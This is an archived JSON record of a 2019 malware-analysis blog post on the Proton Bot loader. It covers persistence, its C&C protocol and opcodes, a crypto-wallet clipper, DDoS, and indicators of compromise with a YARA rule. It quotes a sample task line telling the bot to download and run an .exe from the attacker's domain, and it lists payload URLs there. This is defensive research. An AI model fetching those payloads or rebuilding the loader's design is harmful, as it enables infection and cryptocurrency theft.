{
	"id": "22619806-52d6-4f00-98ca-cafd5d39761b",
	"created_at": "2026-04-06T00:06:06.487977Z",
	"updated_at": "2026-04-10T03:21:50.729937Z",
	"deleted_at": null,
	"sha1_hash": "6475bd37bc0317c1109b818d46ecddb6d08f8c93",
	"title": "Overview of Proton Bot, another loader in the wild!",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 827473,
	"plain_text": "Overview of Proton Bot, another loader in the wild!\r\nPublished: 2019-05-24 · Archived: 2026-04-05 15:49:46 UTC\r\nLoaders are now a fixture of the malware landscape, and it is common to see sandbox results tagged with “loader”. Specialized loader malware like Smoke or Hancitor/Chanitor faces more and more competition from alternatives like Godzilla loader, as well as stealers, miners and plenty of other kinds of malware that offer loading as an optional feature. This is easy to spot and has already been explained in earlier articles I have written.\r\nFor a few months, another dedicated loader has been appearing from multiple sources under the name “Proton Bot”; on my side, the first samples were a v0.30 version. This article will focus on the latest one, v1.\r\nSold for $50 (with C\u0026C panel) and developed in C++, it is cheaper than Smoke (usually seen at an average of $200/$300), which could explain why some actors/customers are making changes and trying new products to see if it is worth continuing with them. The developer behind it (glad0ff) is not at his first malware: he is also behind Acrux \u0026 Decrux.\r\n[Disclaimer: This article is not a deep in-depth analysis]\r\nAnalyzed sample\r\n1AF50F81E46C8E8D49C44CB2765DD71A [Packed]\r\n4C422E9D3331BD3F1BB785A1A4035BBD [Unpacked]\r\nSomething I am finally glad about when reversing this malware is that I did not have to suffer through unpacking a VM-protected sample. By far this is the “only one” I have analyzed from this developer that is not using Themida, VMProtect or Enigma Protector.\r\nSo finally seeing a clean PE is some kind of heaven.\r\nBehavior\r\nWhen the malware is launched, it retrieves the full path of the executed module by calling GetModuleFileName. This returned value is the key Proton Bot uses to check whether this is a first-time run on the victim machine or, on the contrary, an already set-up and configured bot. 
The path is compared with a corresponding name \u0026 repository hardcoded into the code, which are obviously obfuscated and encrypted.\r\nThis call is an alternative to GetCommandLine in this case.\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 1 of 15\n\nOn the screenshot above, EDI contains the path of the payload currently executing and EAX the final location. At this point, with a lack of samples in my possession, I cannot confirm whether this path is unique across all Proton Bot v1 samples or whether multiple values are possible; this will be resolved when more samples become available for analysis…\r\nNext, no matter the scenario, the loader enforces persistence with a scheduled task trick. Multiple obfuscated blocks follow a scheme to generate the command until it is finally assembled and executed with a simple ShellExecuteA call.\r\nWith persistence in place, the comparison between the values shown in the registers now diverges in two directions:\r\nIf paths are different\r\n1. Making an HTTP request to “http://iplogger.org/1i237a” to grab the bot's IP\r\n2. Creating a folder \u0026 copying the payload in an unusual way that I will explain later.\r\n3. Executing Proton Bot again from the correct folder with CreateProcessA\r\n4. Exiting the current module\r\nIf paths are identical\r\n1. Two threads are created for specific purposes:\r\n1. one for the loader\r\n2. the other for the clipper\r\n2. 
At that point, all interactions between the bot and the C\u0026C will always start with this format:\r\n/page.php?id=%GUID%\r\n%GUID% is, in fact, the Machine GUID, so in a real scenario this value could be, for example, “fdff340f-c526-4b55-b1d1-60732104b942”.\r\nSummary\r\nMutex | dsks102d8h911s29\r\nLoader Path | %APPDATA%/NvidiaAdapter\r\nLoader Folder | (screenshot, not captured in this text)\r\nSchedule Task | (screenshot, not captured in this text)\r\nProcess | (screenshot, not captured in this text)\r\nA unique way to perform data interaction\r\nThis loader has an odd and unorthodox way of handling data access and storage: it uses the Windows KTM library. This is quite different from most malware, which usually takes the easier route of creating a folder or a file with the help of the FileAPI module.\r\nThe idea here is to perform actions on data with the guarantee that not a single error occurs during the operation. For this level of reliability and integrity, the Kernel Transaction Manager (KTM) comes into play with the help of Transactional NTFS (TxF).\r\nFor those who aren't familiar with this, here is how it works:\r\n1. CreateTransaction is called to start the transaction\r\n2. The requested task is now called\r\n3. If everything is good, the transaction is finalized with a commit (CommitTransaction), confirming that the operation was a success\r\n4. 
If a single thing fails (even 1 among 10000 tasks), the transaction is rolled back with RollbackTransaction\r\nIn the end, the transacted calls used by ProtonBot are:\r\nDeleteFileTransactedA\r\nCopyFileTransactedA\r\nSetFileAttributesTransactedA\r\nCreateDirectoryTransactedA\r\nThis different way of interacting with the operating system is a nice way to escape some API monitoring and avoid triggers from sandboxes \u0026 specialized software. It is now a matter of time before this behavior is hotfixed and adjusted for better results.\r\nThe same API has also been used for another technique, covered in the analysis of the Osiris banking malware by @hasherezade\r\nAnti-Analysis\r\nThere are three main things exploited here:\r\nStack strings\r\nXOR encryption\r\nXOR key adjusted with a NOT operand\r\nMy guess is that the stack strings are mainly there to obfuscate the code, generating a huge number of blocks during disassembly/debugging to slow down analysis. This is somewhat the same kind of behavior that Predator the Thief abuses from v3 onward.\r\nThe screenshot above is one example among others in this malware of the techniques presented, and there is nothing new to explain in depth here; these have been mentioned multiple times, and I would say with humor that C++ itself is some kind of anti-analysis, enough to require some aspirin.\r\nLoader Architecture\r\nThe loader is divided into 5 main sections:\r\n1. Performing the C\u0026C request to register the bot or ask for a task.\r\n2. Receiving results from the C\u0026C\r\n3. Analyzing the OpCode and executing the corresponding task\r\n4. Sending a request to the C\u0026C to indicate that the task has been accomplished\r\n5. 
Repeat the process [GOTO 1]\r\nC\u0026C requests\r\nFormer loader request\r\nPath base\r\n/page.php\r\nRequired arguments\r\nArgument | Meaning | API Call / Miscellaneous\r\nid | Bot ID | RegQueryValueExA – MachineGUID\r\nos | Operating System | RegQueryValueExA – ProductName\r\npv | Account Privilege | Hardcoded string – “Admin”\r\na | Antivirus | Hardcoded string – “Not Supported”\r\ncp | CPU | Cpuid (Very similar code)\r\ngp | GPU | EnumDisplayDevicesA\r\nip | IP | GetModuleFileName (Yup, it's weird)\r\nname | Username | RegQueryValueExA – RegisteredOwner\r\nver | Loader version | Hardcoded string – “1.0 Release”\r\nlr | ??? | Hardcoded string – “Coming Soon”\r\nAdditional fields when a task is completed\r\nArgument | Meaning | API Call / Miscellaneous\r\nop | OpCode | Integer\r\ntd | Task ID | Integer\r\nTask format\r\nThe task format is really simple and is presented as a simple structure like this:\r\nTask Name;Task ID;Opcode;Value\r\nTasks OpCodes\r\nWhen a task is received, the OpCode is an integer value that selects the specified task. At that time I have counted 12 possible features behind the OpCode; some of them are almost identical and only a small tweak differentiates them.\r\nOpCode | Feature\r\n1 | Loader\r\n2 | Self-Destruct\r\n3 | Self-Renewal\r\n4 | Execute Batch script\r\n5 | Execute VB script\r\n6 | Execute HTML code\r\n7 | Execute Powershell script\r\n8 | Download \u0026 Save new wallpaper\r\n9 | ???\r\n10 | ???\r\n11 | ???\r\n12 | (Supposed) DDoS\r\nFor those who want to see what the loader part looks like in a disassembler, it's quite pleasant (sarcastic)\r\nthe joy of C++\r\nLoader main task\r\nThe loader task is set to OpCode 1. 
In a real scenario, this could look like this one:\r\nnewtask;112;1;http://187.ip-54-36-162.eu/uploads/me0zam1czo.exe\r\nThis is simple but accurate enough to do the job:\r\n1. Set up the download directory in %TEMP% with GetTempPathA\r\n2. Remove footprints from the cache – DeleteUrlCacheEntryA\r\n3. Download the payload – URLDownloadToFileA\r\n4. Set attributes on the file by using transactions\r\n5. Execute the payload – ShellExecuteA\r\nOther features\r\nClipper\r\nClipper fundamentals are always the same, and at this point I am mostly interested in how the developer decided to organize this task. In this case, it is simple but enough to perform some things accurately.\r\nThe first main thing to report is that the wallets and their respective regular expressions for detecting them are not hardcoded into the source code; a single HTTP request to the C\u0026C is needed to set this up:\r\n/page.php?id=%GUID%\u0026clip=get\r\nThe response is a consolidated list in a homemade structure that contains the configuration decided by the attacker. 
The format is represented like this:\r\n[\r\n id, # ID on C\u0026C\r\n name, # ID Name (i.e: Bitcoin)\r\n regex, # Regular Expression for catching the Wallet\r\n attackerWallet # Switching victim wallet with this one\r\n]\r\nAt first, I thought there was a request to the C\u0026C when the clipper matched a regular expression, but that is not the case here.\r\nIn this case, the attacker has decided to target some wallets:\r\nBitcoin\r\nDash\r\nLitecoin\r\nZcash\r\nEthereum\r\nDogeCoin\r\nIf you want an in-depth analysis of a clipper task, I recommend you check my other articles that cover this in detail (Megumin \u0026 Qulab).\r\nDDoS\r\nProton has an implemented layer 4 DDoS attack, flooding the target server with TCP socket requests on a specified port using WinSock\r\nExecuting scripts\r\nThe loader is also configured to launch scripts. This technique is usually spotted and shared by researchers on Twitter, with a bunch of raw Pastebin links downloaded and adjusted to be able to work.\r\n1. Deobfuscating the selected format (.bat in this case)\r\n2. Download the script to %TEMP%\r\n3. Change the type of the downloaded script\r\n4. Execute the script with ShellExecuteA\r\nAvailable formats are .bat, .vbs, .ps1, .html\r\nWallpaper\r\nIt is possible to change the bot's wallpaper by sending OpCode 8 with an image to download. The scenario remains the same as the loader main task, with the exception of a different API call at the end\r\n1. Set up the download directory in %TEMP% with GetTempPathA\r\n2. Remove footprints from the cache – DeleteUrlCacheEntryA\r\n3. Download the image – URLDownloadToFileA\r\n4. 
Change the wallpaper with SystemParametersInfoA\r\nIn this case the call looks like this:\r\nBOOL SystemParametersInfoA (\r\n UINT uiAction -\u003e 0x0014 (SPI_SETDESKWALLPAPER)\r\n UINT uiParam -\u003e 0\r\n PVOID pvParam -\u003e %ImagePath%\r\n UINT fWinIni -\u003e 1\r\n);\r\nI can't clearly understand the utility of this on my side, but it has surely been developed for a reason. Maybe in the future I will have the explanation, or if you have an idea, share your thoughts about it 🙂\r\nExample in the wild\r\nA few days ago, a ProtonBot C\u0026C (187.ip-54-36-162.eu) was quite noisy spreading malware, with a list counting 5000 bots. That is enough to suggest that some business has already started with this one.\r\nNotable malware hosted and/or pushed by this Proton Bot\r\nQulab\r\nProtonBot 🙂\r\nCoinMiners\r\nC# RATs\r\nAnother thing to notice is that the domain itself was also hosting other payloads not directly linked to the loader, and one sample was also spotted on another domain \u0026 loader service (Prostoloader). 
It's common nowadays to see threat actors paying for multiple services to spread their payloads and maximize profits.\r\nAll of them are accessible on the malware tracker.\r\n[*] Yellow means duplicate hashes in the database.\r\nIoC\r\nProton Bot\r\n187.ip-54-36-162.eu/cmdd.exe\r\n9af4eaa0142de8951b232b790f6b8a824103ec68de703b3616c3789d70a5616f\r\nPayloads from Proton Bot C2\r\nUrls\r\n187.ip-54-36-162.eu/uploads/0et5opyrs1.exe\r\n187.ip-54-36-162.eu/uploads/878gzwvyd6.exe\r\n187.ip-54-36-162.eu/uploads/8yxt7fd01z.exe\r\n187.ip-54-36-162.eu/uploads/9xj0yw51k5.exe\r\n187.ip-54-36-162.eu/uploads/lc9rsy6kjj.exe\r\n187.ip-54-36-162.eu/uploads/m3gc4bkhag.exe\r\n187.ip-54-36-162.eu/uploads/me0zam1czo.exe\r\n187.ip-54-36-162.eu/uploads/Project1.exe\r\n187.ip-54-36-162.eu/uploads/qisny26ct9.exe\r\n187.ip-54-36-162.eu/uploads/r5qixa9mab.exe\r\n187.ip-54-36-162.eu/uploads/rov08vxcqg.exe\r\n187.ip-54-36-162.eu/uploads/ud1lhw2cof.exe\r\n187.ip-54-36-162.eu/uploads/v6z98xkf8w.exe\r\n187.ip-54-36-162.eu/uploads/vww6bixc3p.exe\r\n187.ip-54-36-162.eu/uploads/w1qpe0tkat.exe\r\nHashes\r\n349c036cbe5b965dd6ec94ab2c31a3572ec031eba5ea9b52de3d229abc8cf0d1\r\n42c25d523e4402f7c188222faba134c5eea255e666ecf904559be399a9a9830e\r\n5de740006b3f3afc907161930a17c25eb7620df54cff55f8d1ade97f1e4cb8f9\r\n6a51154c6b38f5d1d5dd729d0060fa4fe0d37f2999cb3c4830d45d5ac70b4491\r\n77a35c9de663771eb2aef97eb8ddc3275fa206b5fd9256acd2ade643d8afabab\r\n7d2ccf66e80c45f4a17ef4ac0355f5b40f1d8c2d24cb57a930e3dd5d35bf52b0\r\naeab96a01e02519b5fac0bc3e9e2b1fb3a00314f33518d8c962473938d48c01a\r\nba2b781272f88634ba72262d32ac1b6f953cb14ccc37dc3bfb48dcef76389814\r\nbb68cd1d7a71744d95b0bee1b371f959b84fa25d2139493dc15650f46b62336c\r\nc2a3d13c9cba5e953ac83c6c3fe6fd74018d395be0311493fdd28f3bab2616d9\r\ncbb8e8624c945751736f63fa1118032c47ec4b99a6dd03453db880a0ffd1893f\r\ncd5bffc6c2b84329dbf1d20787b920e5adcf766e98cea16f2d87cd45933be856\r\nd3f3a3b4e8df7f3e910b5855087f9c280986f27f4fdf54bf8b7c777dffab5ebf\r\ne1d8a09c66496e5b520950a9bd5d3a238c33c2de8089703084fcf4896c4149f0\r\nDomains\r\n187.ip-54-36-162.eu\r\nPDB\r\nE:\\PROTON\\Release\\build.pdb\r\nWallets\r\n3HAQSB4X385HTyYeAPe3BZK9yJsddmDx6A\r\nXbQXtXndTXZkDfb7KD6TcHB59uGCitNSLz\r\nLTwSJ4zE56vZhhFcYvpzmWZRSQBE7oMSUQ\r\nt1bChFvRuKvwxFDkkm6r4xiASBiBBZ24L6h\r\n1Da45bJx1kLL6G6Pud2uRu1RDCRAX3ZmAN\r\n0xf7dd0fc161361363d79a3a450a2844f2a70907c6\r\nD917yfzSoe7j2es8L3iDd3sRRxRtv7NWk8\r\nThreat Actor\r\nGlad0ff (Main)\r\nProtonSellet (Seller)\r\nYara\r\nrule ProtonBot : ProtonBot {\r\n    meta:\r\n        description = \"Detecting ProtonBot v1\"\r\n        author = \"Fumik0_\"\r\n        date = \"2019-05-24\"\r\n    strings:\r\n        $mz = {4D 5A}\r\n        $s1 = \"proton bot\" wide ascii\r\n        $s2 = \"Build.pdb\" wide ascii\r\n        $s3 = \"ktmw32.dll\" wide ascii\r\n        $s4 = \"json.hpp\" wide ascii\r\n    condition:\r\n        $mz at 0 and (all of ($s*))\r\n}\r\nConclusion\r\nYoung malware means fresh content and, with time and luck, could impact the malware 
landscape. This loader is cheap and will probably draw the attention of some customers (or already has), who want lower costs to maximize profits during attacks. ProtonBot is not a sophisticated malware, but it does its job, with extra modules probably there to make it more attractive. Let's see with time how this one will evolve, but seeing some odd cases with plenty of different malware pushed by this one, that could be one scenario among others we could see in the future.\r\nOn my side, it's time to chill a little.\r\nSpecial Thanks – S!ri \u0026 Snemes\r\nSource: https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/"
	],
	"report_names": [
		"overview-of-proton-bot-another-loader-in-the-wild"
	],
	"threat_actors": [],
	"ts_created_at": 1775433966,
	"ts_updated_at": 1775791310,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6475bd37bc0317c1109b818d46ecddb6d08f8c93.pdf",
		"text": "https://archive.orkl.eu/6475bd37bc0317c1109b818d46ecddb6d08f8c93.txt",
		"img": "https://archive.orkl.eu/6475bd37bc0317c1109b818d46ecddb6d08f8c93.jpg"
	}
}